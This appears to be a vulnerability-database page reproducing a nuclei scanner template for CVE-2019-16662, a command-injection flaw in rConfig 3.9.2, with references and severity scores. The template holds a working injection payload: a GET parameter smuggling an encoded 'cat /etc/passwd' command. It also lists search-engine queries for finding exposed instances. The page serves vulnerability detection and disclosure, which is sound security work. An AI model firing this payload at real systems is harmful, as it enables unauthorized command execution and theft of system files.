Lucene search
K

rConfig 3.9.2 - Remote Code Execution

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 57 Views

rConfig 3.9.2 - Remote Code Execution vulnerability, allows unauthorized system command execution through ajaxServerSettingsChk.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
rConfig 3.9.2 - Remote Code Execution Exploit
29 Oct 201900:00
zdt
0day.today
rConfig - install Command Execution Exploit
9 Nov 201900:00
zdt
ATTACKERKB
CVE-2019-16662
28 Oct 201900:00
attackerkb
Circl
CVE-2019-16662
3 Nov 201912:10
circl
Circl
CVE-2019-16663
3 Nov 201912:10
circl
Check Point Advisories
rConfig Remote Code Execution (CVE-2019-16662; CVE-2019-16663)
5 Nov 201900:00
checkpoint_advisories
CVE
CVE-2019-16662
28 Oct 201911:52
cve
CVE
CVE-2019-16663
28 Oct 201911:53
cve
Cvelist
CVE-2019-16662
28 Oct 201911:52
cvelist
Cvelist
CVE-2019-16663
28 Oct 201911:53
cvelist
Rows per page
id: CVE-2019-16662

info:
  name: rConfig 3.9.2 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and complete compromise of the affected system.
  remediation: |
    Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16662
    - https://drive.google.com/open?id=1OXI5cNuwWqc6y-7BgNCfYHgFPK2cpvnu
    - http://packetstormsecurity.com/files/154999/rConfig-3.9.2-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/155186/rConfig-3.9.2-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16662
    cwe-id: CWE-78
    epss-score: 0.97702
    epss-percentile: 0.99896
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rconfig
    product: rconfig
    shodan-query: http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2019,cve,intrusive,rconfig,packetstorm,rce,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ac4704847c4e1ac8291328c2b0a4c8987c3466ca47dabcc540b519b614bc3d37022100d1042e8deb052c467e9ebdb48e19d97b592cc087d9c6122374157fdca7a4ba0e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.19.8
CVSS 210
EPSS0.97702
57